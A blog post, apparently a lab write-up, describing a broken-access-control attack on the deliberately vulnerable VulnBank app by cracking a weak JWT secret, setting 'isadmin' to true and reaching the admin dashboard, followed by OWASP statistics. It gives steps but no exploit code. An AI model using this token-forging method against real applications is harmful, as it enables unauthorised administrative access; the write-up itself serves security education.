DEV Community

Richard Ndung'u
Richard Ndung'u

Posted on

JWT Hacking: Broken Access Control Exploit.

#webdev #cybersecurity #techtalks #softwaredevelopment

The cyber world

Richard ndung'u cyber security
JWT tokens are one of the most popular ways to implement authentication and authorization in web applications.

If not implemented securely, then they can be dangerous, as threat actors have ways to crack them and use them to break into the application

In this write-up, I exploited the JWT token of VulnBank and accessed the Admin Dashboard. This is a broken access control attack where weak JWT tokens are exploited

JWT in a Nutshell

header.payload.signature

  • Header (metadata about the token)

  • Payload (claims / user data)

  • Signature (used to verify integrity)

Header (JSON)

{
"alg": "HS256",
"typ": "JWT"
}

Payload (JSON)

{
"sub": "1234567890",
"name": "Richard Ndung'u",
"role": "admin",
"iat": 1694010000,
"exp": 1694013600
}
The Attack In VulnBank

Api documentation
Endpoint Discovery in the API documentation revealed the ADMIN endpoint that may be exploited.

https://vulnbank.org/api/docs/

Register endpoint
Registering as a user and using Burp Suite to intercept traffic allowed me to capture the token

Richard mndung'u cyber security

JWT cracking
I used JWT security checker to attack the JWT and get the security Key.

richard ndung'u cyber security

JWT modification
Changed the "isadmin" parameter to "true" from "false", **then generated a new JWT **that I used to log in at the admin dashboard

richard ndungu'u cyber security

Admin dashboard
logged in to the admin dashboard. The modified JWT was used to log in to the Admin dashboard

Richard ndungu cyber security

Broken Access control
This attack falls under Broken Access Control, the number 1 OWASP Top 10 attack.

According to OWASP(2021)

  • 94% of applications tested had at least one form of broken access control

  • The average incidence rate across the tested applications was 3.81%, indicating that although testing coverage was high, not every test revealed an issue

  • OWASP identified 318,487 total occurrences of broken access control, which is the highest among all categories

Kaspersky study(2021-2023)

  • 70% of tested corporate web applications exhibited broken access control vulnerabilities Among these,37% were rated high-risk,49% medium-risk, and 14% low-risk

Conclusion

This project demonstrates how it is easy for tokens to be stolen and used if developers do not use strong secret keys. Appsec and Devsecops Engineers have the responsibility to test the JWT tokens to reduce the risk of broken access control

Top comments (0)